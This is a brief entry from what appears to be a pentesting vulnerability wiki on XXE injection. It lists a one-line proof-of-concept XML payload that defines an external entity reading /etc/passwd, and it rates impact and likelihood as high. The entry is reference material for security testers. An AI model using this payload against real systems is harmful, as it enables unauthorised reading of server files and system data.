Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

XXE

POC

Provide the following input as the XML content <?xml version="1.0"?> <!DOCTYPE cdl [<!ENTITY asd SYSTEM "file:///etc/passwd">]> &asd;

For more info, please refer to: https://blog.cobalt.io/how-to-execute-an-xml-external-entity-injection-xxe-5d5c262d5b16

Impact

High

Likelihood

High